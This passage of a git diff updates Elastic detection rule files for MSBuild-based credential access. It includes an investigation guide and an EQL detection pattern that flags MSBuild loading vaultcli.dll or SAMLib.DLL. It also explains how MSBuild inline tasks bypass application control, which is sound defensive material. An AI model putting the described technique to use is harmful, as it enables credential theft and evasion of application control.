The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine 
registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n",
 "related_integrations": [
 {
@@ -88,7 +88,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json
index 6b431caa525..b484985bd67 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json
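Review bot: The new-side `note` keeps an investigation step that says to search for logon events "to the target host after the registry modification", but nothing in this rule involves the registry: the query in the hunk's context lines fires on MSBuild loading `vaultcli.dll` or `SAMLib.DLL`, so the sentence reads as a copy-paste from another guide and points the analyst at an event that does not exist for this alert. Suggest changing that step to `Analysts can do this by searching for login events (for example, 4624) to the target host after the DLL load.` The identical wording appears in the `_105` version of this rule, whose hunk begins at the end of this chunk and would need the same fix.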
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json index 852c80159e5..f6d2846f298 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json 
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json index 4788db1768b..770b7e2df38 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json 
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
